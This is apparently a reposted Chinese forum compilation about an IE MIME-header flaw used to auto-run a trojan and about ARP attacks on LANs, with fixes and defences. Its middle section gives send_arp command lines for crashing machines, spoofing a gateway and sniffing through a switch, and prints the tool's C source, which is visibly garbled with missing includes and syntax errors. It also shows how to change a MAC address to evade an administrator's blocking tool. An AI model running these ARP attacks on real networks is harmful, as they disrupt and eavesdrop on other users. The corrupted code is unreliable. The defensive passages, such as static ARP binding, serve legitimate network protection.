现在,再回过头来看看我所中的木马是怎么回事。其实,wincfg.exe这个文件在这里相当于邮件的附件,从我们所列的代码中可以看到,攻击者把wincfg.exe的的类型定义为audio/x-wav,由于邮件的类型为audio/x-wav时,IE存在的这个错误的MIME头漏洞会将附件认为是音频文件自动尝试打开,结果导致邮件文件a.eml中的附件wincfg.exe被执行。在win2000下,即使是用鼠标点击下载下来的 a.eml,或是拷贝粘贴该文件,都会导致a.eml中的附件被运行,微软的这个漏洞可真是害人不浅啊。现在看来,原先那些攻击者想方设法欺骗被攻击目标执行修改过的木马等后门程序,是多么落后的手段啊!如今,利用微软“创造”的这个大漏洞来进行攻击,是那么的简单、多么的容易啊!唯一的条件就是被攻击目标使用IE5.0、5.01、5.5这些浏览器中的一种,使用IE浏览器的用户到底有多少呢?看看你身边的朋友就知道答案了!
解决办法:
如果你浏览网页中了该木马,可以用下面的方法来加以解决:
(1)点击“开始”→“运行”,在弹出的对话框中输入regedit,回车。然后展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下删除wincfg.exe;
(2)到你的计算机的系统目录下,如果操作系统是Win2000,则到c:\winnt下;如果你的操作系统为Win98,则到c:\windows下,删除其中的wincfg.exe
文件。
(3)重新启动机器,一切OK了!
预防方法:
1.最好的办法是不使用IE和Outlook。可以用Netscape代替IE,用Foxmail代替Outlook。如果非要用,建议你按下面的方法进行操作:
(1)运行IE,点击“工具→Internet选项→安全→Internet区域的安全级别”,把安全极别由“中”改为“高”。
(2)接着,点击“自定义级别”按钮,在弹出的窗口中,禁用“对标记为可安全执行脚本的ActiveX控件执行脚本”选项。
(3)同理,在此窗口中禁用IE的“活动脚本”和“文件下载”功能。
(4)禁用所有的ActiveX控制和插件。
(5)设置资源管理器成“始终显示扩展名”。
(6)禁止以WEB方式使用资源管理器。
(7)取消“下载后确认打开”这种扩展名属性设置。
(8)永远不直接从IE浏览器中选择打开文件。
2.不要受陌生人的诱惑打开别人给你的RUL,如果确实想看,可以通过一些下载工具把页面下载下来,然后用记事本等一些文本编辑工具打开查看代码。
3.微软公司为该漏洞提供了一个补丁,赶快到下面所列出的URL去看看吧:
http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp局域网攻击之解决方法
我一个朋友的网吧最近遭受一种奇怪的攻击,他网吧一共有60台机器,和另外6个网吧并在一个网段中,IP地址从192.168.0.1~192.168.0.255,大家共用CS服务器和WEB及流媒体服务器,其中一台CS服务器和流媒体服务器在他网吧里。
最近每晚和中午,他网吧客满的时候,就有人在网内对他网吧的IP段进行攻击。表现是大面积IP地址冲突,造成机器暂时停止网络响应,而且网络中的 CS服务器和流媒体服务器马上停止响应。一般持续半小时以上,IP冲突的速度大约10秒一次。连续几天都是如此,造成他很大损失。
我朋友求助于我,于是我先试验了一下,证明故意修改IP的方式是无法造成服务器失去响应的,于是我在他网吧两台机器上安装了一些监测软件,试图捕捉对方的攻击
数据包,然后再取得对方的MAC地址来查找攻击来源。由于主要表现是IP冲突,所以我使用commview3专门捕捉所有的ARP协议包,结果在晚上对方攻击时果然发现出现了大量有规律的ARP
广播包,那些包明显是某种软件生成的,MAC地址是随机伪造的,IP地址就是他网吧的系列IP,这种包和一般开机的包不同,是pass-thourgh包,机器收到后98系统马上失去网络响应,只有等很长时间或者重起,2K系统也马上失去响应,必须点确定才能恢复,但是所有连接的用户都Time Out了。
由于包里MAC地址是伪造的,所以我无法查到来源,于是我去网上查找了一些资料,证明这是一种ARP拒绝服务攻击,但是没找到任何有效防范办法,微软也没有相应的补丁。唯一的办法除非在网络中使用
路由器屏蔽ARP,用硬件存储ARP列表,但是
路由器不是一个小网吧可以承担的设备。当然如果划分网段,再用网关把他和大家隔开也可以,因为ARP只在一个网段传播,但是这样别人就无法共用他们的服务器,而且破坏者也可以到他网吧来继续破坏,这也是不行的。
我又
试用了各种防火墙软件,证明也无法拦住这样的攻击包,没有一个防火墙产品可以屏蔽非法的ARP包。使用天网2.5和金山网镖,甚至用断开网络选项都无法挡住攻击。
我后来在网上找到了一个叫做“……”(为防止别有用心的人用来干坏事,我略去这个软件的名字,转贴者也就是本人注)的软件,果然可以达到这个效果,证明这样的攻击软件在网上是大量存在的,大家可以去google里搜索下载这个软件。
我现在唯一能告诉他的办法就是遇到攻击就拔网线,各位高手,还有没有什么低廉方便的手段能解决这个问题啊,我朋友都急死了,再这样他的网吧就做不下去了。
请大家帮帮忙!!谢谢:)
分析:
网上关于ARP的资料已经很多了,就不用我都说了。
用某一位高手的话来说,“我们能做的事情很多,唯一受
限制的是我们的创造力和想象力”。
ARP也是如此。
以下讨论的机子有
一个要攻击的机子:10.5.4.178
硬件地址:52:54:4C:98:EE:2F
我的机子: :10.5.3.69
硬件地址:52:54:4C:98:ED:C5
网关: 10.5.0.3
硬件地址:00:90:26:3D:0C:F3
一台交
换机另一端口的机子:10.5.3.3
硬件地址:52:54:4C:98:ED:F7
一:用ARP破WINDOWS的
屏保原理:利用IP冲突的级别比屏保高,当有冲突时,就会
跳出屏保。
关键:ARP包的数量适当。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \
10.5.4.178 52:54:4C:98:EE:2F 40
二:用ARP导致IP冲突,死机
原理:WINDOWS 9X,NT4在处理IP冲突时,处理不过来,导致死机。
注: 对WINDOWS 2K,LINUX相当于flooding,只是比一般的FLOODING
有效的多.对LINUX,明显系统被拖慢。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \
10.5.4.178 52:54:4C:98:EE:2F 999999999
三:用ARP欺骗网关,可导致局域网的某台机子出不了网关。
原理:用ARP应答包去刷新对应着要使之出不去的机子。
[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 \
10.5.4.178 00:90:26:3D:0C:F3 1
注意:如果单单如上的命令,大概只能有效几秒钟,网关机子里的ARP
高速缓存会被被攻击的机子正确刷新,于是只要...
四:用ARP欺骗交换机,可监听到交换机另一端的机子。
可能需要修改一下send_arp.c,构造如下的数据包。
ethhdr
srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H
arphdr
hwtype:1 protol:800H hw_size:6 pro_size:4 op:1
s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3
d_ha:00:00:00:00:00:00 d_ip:10.5.3.3
然后就可以sniffer了。
原理:
交换机是具有记忆MAC地址功能的,它维护一张MAC地址和它的口号表
所以你可以先来个ARP 欺骗,然后就可以监听了
不过需要指出,欺骗以后,同一个MAC地址就有两个端口号
yuange说,“这样其实就是一个竞争问题。”
好象ARP 以后,对整个网络会有点影响,不过我不敢确定
既然是竞争,所以监听也只能监听一部分,不象同一HUB下的监听。
对被监听者会有影响,因为他掉了一部分数据。
当然还有其他一些应用,需要其他技术的配合。
以下是send_arp.c的源程序
/*
This program sends out one ARP packet with source/target IP
and Ethernet hardware addresses suuplied by the user. It
compiles and works on Linux and will probably work on any
Unix that has SOCK_PACKET. volobuev@t1.chem.umn.edu
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define OP_ARP_QUEST 1
#define DEFAULT_DEVICE "eth0"
char usage[] = {"send_arp: sends out custom ARP packet. yuri volobuev
usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"};
struct arp_packet
{
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};
void die (char *);
void get_ip_addr (struct in_addr *, char *);
void get_hw_addr (char *, char *);
int main (int argc, char * argv[])
{
struct in_addr src_in_addr, targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;
int j,number;
if (argc != 6)
die(usage);
sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_
rarP));
if (sock < 0)
{
perror("socket");
exit(1);
}
number=atoi(argv[5]);
pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op = htons(OP_ARP_QUEST);
get_hw_addr(pkt.targ_hw_addr, argv[4]);
get_hw_addr(pkt.rcpt_hw_addr, argv[4]);
get_hw_addr(pkt.src_hw_addr, argv[2]);
get_hw_addr(pkt.sndr_hw_addr, argv[2]);
get_ip_addr(&src_in_addr, argv[1]
get_ip_addr(&targ_in_addr, argv[3]
memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN);
bzero(pkt.padding,18);
strcpy(sa.sa_data,DEFAULT_DEVICE);
for (j=0;j {
if (sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}
}
exit(0);
}
void die (char *str)
{
fprintf(stderr,"%s\n",str);
exit(1);
}
void get_ip_addr (struct in_addr *in_addr, char *str)
{
struct hostent *hostp;
in_addr->s_addr = inet_addr(str);
if(in_addr->s_addr == -1)
{
if ((hostp = gethostbyname(str)))
bcopy(hostp->h_addr, in_addr, hostp->h_length);
else {
fprintf(stderr, "send_arp: unknown host %s\n", str);
exit(1);
}
}
}
void get_hw_addr (char *buf, char *str)
{
int i;
char c, val;
for(i = 0; i < ETH_HW_ADDR_LEN; i++)
{
if (!(c = tolower(*str++)))
die("Invalid hardware address");
if (isdigit?)
val = c - '0';
else if (c >= 'a' && c <= 'f')
val = c-'a'+10;
else
die("Invalid hardware address");
*buf = val << 4;
if (!(c = tolower(*str++)))
die("Invalid hardware address");
if (isdigit?)
val = c - '0';
else if (c >= 'a' && c <= 'f')
val = c-'a'+10;
else
die("Invalid hardware address");
*buf++ |= val;
if (*str == ':')
str++;
}
}
以下是我用軟件攔下的局域網終結者的記錄﹐看來這個軟件只是根據你在攻擊軟件里面輸入的IP列表的IP及MAC地址﹐然后產生一個假的MAC地址去﹐使正在使用的網絡發生異常﹐我也試著解決這個問題﹐但目前除了靜態ARP之外﹐沒有其他更好的辦法了﹐這是采用TCP/IP協議的必然了。
但是作為網管﹐完全可以追蹤到搞破壞的人的電腦呀﹐然后把此人打成馬蜂窩﹐并送公安局﹐這種只會利用別人現在工具搞破壞的人最可誤了﹗有能力自己寫吧﹗
下面作參考﹐但不要攻擊我呀﹐如果有錯誤﹐請大家指正﹐謝謝了﹗
1581 89.348477 LOCAL REALTEEE1819 SMB R tree disconnect FANLI 7733797.00E04CEE1819 IPX/XNS
Frame: Base frame properties
Frame: Time of capture = 2002/10/23 13:48:21.616
Frame: Time delta from previous physical frame: 0 microseconds
Frame: Frame number: 1581
Frame: Total frame length: 100 bytes
Frame: Capture frame length: 100 bytes
Frame: Frame data: Number of data bytes remaining = 100 (0x0064)
ETHERNET: 802.3 Length = 100
ETHERNET: Destination address : 00E04CEE1819
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00E04CF8B16B
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 100 (0x0064)
ETHERNET: Data Length : 0x0056 (86)
ETHERNET: Ethernet Data: Number of data bytes remaining = 86 (0x0056)
LLC: UI DSAP=0xE0 SSAP=0xE0 C
LLC: DSAP = 0xE0 : INDIVIDUAL : Novell IPX/SPX
LLC: SSAP = 0xE0: COMMAND : Novell IPX/SPX
LLC: Frame Category: Unnumbered Frame
LLC: Command = UI
LLC: LLC Data: Number of data bytes remaining = 83 (0x0053)
IPX: NetBIOS Packet - 7733797.00E04CF8B16B.455 -> 7733797.00E04CEE1819.455 - 0 Hops
IPX: Checksum = 65535 (0xFFFF)
IPX: IDP Length = 83 (0x53)
IPX: Transport control = 0 (0x0)
IPX: Packet type = IPX
IPX: Destination Address Summary 7733797.00E04CEE1819.455
IPX: Destination IPX Address = 07733797.00E04CEE1819
IPX: Destination Net Number = 124991383 (0x7733797)
IPX: Destination Socket Number = NetBIOS
IPX: Source Address Summary 7733797.00E04CF8B16B.455
IPX: Source IPX Address = 07733797.00E04CF8B16B
IPX: Source Net Number = 124991383 (0x7733797)
IPX: Source Socket Number = NetBIOS
IPX: Data: Number of data bytes remaining = 53 (0x0035)
NBIPX: Session Data
NBIPX: Connection control flag
NBIPX: 0....... = Non system packet
NBIPX: .0...... = No send acknowledge
NBIPX: ..0..... = No Attention
NBIPX: ...1.... = End Of Message
NBIPX: ....0... = No resend
NBIPX: Data stream type = Session Data
NBIPX: Source connection ID = 10227 (0x27F3)
NBIPX: Destination connection ID = 3 (0x3)
NBIPX: Send sequence number = 119 (0x77)
NBIPX: Total data length = 35 (0x23)
NBIPX: Offset = 0 (0x0)
NBIPX: Data length = 35 (0x23)
NBIPX: Receive Sequence number = 122 (0x7A)
NBIPX: Bytes received = 127 (0x7F)
NBIPX: Data: Number of data bytes remaining = 35 (0x0023)
SMB: R tree disconnect
SMB: NT status code = 0x0, Facility = System, Severity = Success, Code = (0) STATUS_WAIT_0
SMB: NT Status Severity Code = Success
SMB: NT Status Customer Code = 0 (0x0)
SMB: NT Status Reserved Bit = 0 (0x0)
SMB: NT Status Facility = System
SMB: NT Status Code System Success = STATUS_WAIT_0
SMB: Header: PID = 0xFEFF TID = 0x0803 MID = 0x5E84 UID = 0x6801
SMB: Tree ID (TID) = 2051 (0x803)
SMB: Process ID (PID) = 65279 (0xFEFF)
SMB: User ID (UID) = 26625 (0x6801)
SMB: Multiplex ID (MID) = 24196 (0x5E84)
SMB: Flags Summary = 152 (0x98)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 1....... = Server response
SMB: flags2 Summary = 51207 (0xC807)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS namespace
SMB: ..0............. = No paging of IO
SMB: .1.............. = Using NT status codes
SMB: 1............... = Using UNICODE strings
SMB: Unknown Flag2 bits = 2052 (0x804)
SMB: Command = C tree disconnect
SMB: Word count = 0
SMB: Byte count = 0
00000: 00 E0 4C EE 18 19 00 E0 4C F8 B1 6B 00 56 E0 E0 .àL?...àL?±k.Vàà
00010: 03 FF FF 00 53 00 04 07 73 37 97 00 E0 4C EE 18 .??.S...s7—.àL?.
00020: 19 04 55 07 73 37 97 00 E0 4C F8 B1 6B 04 55 10 ..U.s7—.àL?±k.U.
00030: 06 F3 27 03 00 77 00 23 00 00 00 23 00 7A 00 7F .ó'..w.#...#.z.?
00040: 00 FF 53 4D 42 71 00 00 00 00 98 07 C8 00 00 00 .?SMBq....?;.è...
00050: 00 00 00 00 00 00 00 00 00 03 08 FF FE 01 68 84 ...........?t.h?;
00060: 5E 00 00 00 ^...
解决方法:
方法一:
网段A(192.168.0.x) 通过------> 网关服务器(192.168.0.1;192.168.10.1) -----〉 和网段B(192.168.10.x)通信。
假设架设 CS服务器在 网段B 192.168.10.88 机器上,
现在 在 网关服务器上架着一个端口转发程序(有很多的自己找)
比如定义 网关服务器的27015端口 转发 指定 192.168.0.10.88 的27015端口
现在在网段A(192.168.0.x) 的玩家只要的 互联网游戏地址处加入 192.168.0.1:27015 就可以找到 192.168.10.88 的CS服务器了
个人认为比较好的 办法是 把网段分开 , 在网关服务器上做端口转发服务
来达到 共享CS服务器等 功能,就可以解决了~
方法二:
捆绑MAC和IP地址 杜绝IP地址盗用现象
到代理服务器端让网络管理员把您上网的静态IP地址与所记录计算机的网卡地址进行捆绑。具体命令是:
ARP -s 192.168.0.4 00-EO-4C-6C-08-75
这样,就将您上网的静态IP地址192.168.0.4与网卡地址为00-EO-4C-6C-08-75的计算机绑定在一起了,即使别人盗用您的IP地址192.168.0.4也无法通过代理服务器上网。其中应注意的是此项命令仅在局域网中上网的代理服务器端有用,还要是静态IP地址,像一般的Modem拨号上网是动态IP地址就不起作用。接下来我们对各参数的功能作一些简单的介绍:
ARP-s-d-a
-s——将相应的IP地址与物理地址的捆绑。
-d——删除所给出的IP地址与物理地址的捆绑。
-a——通过查询Arp协议表来显示IP地址和对应物理地址情况。
方法三:
网络执法官这个软件相信大家都听说过了。功能不错,可以禁止局域网任意机器连接网络。这个功能对网管来说的确不错。不过如果这个软件落到那些卑鄙小人的手里---那后果就不堪设想了。轻则把你封了上不了网,重则可以导致整个局域网瘫痪。。
废话不说了,切入正题吧。现在教大家两招轻松防范网络执法官!!
NO.1
首先呢,最稳妥的一个办法就是修改机器的MAC地址,只要把MAC地址改为别的,就可以欺骗过网络执法官,从而达到突破封锁的目的。下面是修改MAC地址的方法:
linux环境下:
需要用
#ifconfig eth0 down
先把网卡禁用
再用ifconfig eth0 hw ether 1234567890ab
这样就可以改成功了
要想永久改就这样
在/etc/rc.d/rc.local里加上这三句(也可以在/etc/init.d/network里加下面三行)
ifconfig eth0 down
ifconfig eth0 hw ether 1234567890ab
ifconfig eth0 up
另:
在win2000中改MAC地址的方法:
打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class \子键,在该子键下的0000,0001,0002等分支中查找DriverDesc,在0000子键下天一个字符串项,命名为 NetworkAddress,键值设为修改后的MAC地址,要求为连续的12个16进制数,如1234567890AB(注意位数要对!不能是 000000000000,不能与别的机器重复)。然后在0000下的NDI\params中加一项名为NetworkAddress的子键,在该子键下添加名为defau
lt的字符串,键值为修改后的MAC地址,与上面的数值相同。在NetworkAddress的主键下继续添加命名为ParamDesc的字符串,其作用是制定NetworkAddress主键的描述,其值可为“MAC 地址”,这样以后打开网络属性,双击相应的网卡会发现有一个高级设置,其下坐在“MAC地址”的选项,在此修改MAC地址就可以了,修改后需重启。
Windows环境:
用dos,8139的可以改,用realtek的pg8139.exe,比如 是8139c网卡,就改写8139c.cfg文件,第一行就是网卡mac,想怎么改就怎么改
NO.2
另外一种方法,我没有试,一种设想,有条件的朋友帮忙试一下。
由于网络执法官的原理是通过ARP欺骗发给被攻击的电脑一个假的网关IP地址对应的MAC,使其找不到网关真正的MAC,那么我们可以自己修改IP->MAC的映射,使网络执法官ARP欺骗失效。具体做法如下:
在还没有被封锁的时候进入CMD执行如下命令
e:\>ping 192.168.9.1 (假设此地址位网关。)
Pinging 192.168.9.1 with 32 bytes of data:
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Ping statistics for 192.168.9.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
e:\>arp -a
Interface: 192.168.9.1 on Interface 0x5000003
Internet Address Physical Address Type
192.168.9.1 00-0E-70-32-f1-02 dynamic
(上面的就是网关的MAC)
然后作这样一个批处理文件保存起来。。注意!!!地址要换为你自己的网关的IP和MAC
arp -s 192.168.9.1 00-0E-70-32-f1-02
然后呢,在你被封锁的时候,就执行这个批处理吧。
NO.3
如果解除了网络执法官的封锁可不可以查到使用网络执法官的人究竟是谁呢?答案是可以!(感谢zva提供方法)利用arpkiller的 sniffer杀手扫描整个局域网IP段查找处在“混杂”(监听)模式下的计算机,应该就是他了!!!(注意,扫描的时候自己也处在混杂模式,自己不能算哦)
之后做什么呢?就不用我说了吧?哈哈,以毒攻毒,用网络执法官把她封了!
附:
用到的工具在此下载:
网络执法官1.02注册版
http://soft.piaoye.com/downtrojan/lanlawman1.02.ziparpkiller:
http://www.chinesehack.org/soft/sni...RPKiller1.3.zip贴子来源:
http://www.adsl4u.net/cn原作者:小兔
转贴和评论者:子钧
评论:
防止这种攻击最好的办法就是MAC地址和IP地址绑定,也可以防止用
黑白名单时盗用白名单的IP,对于一些单位的网络控制也有点用处。
不会查MAC地址的初学者用 ipconfig/all 就可以显示了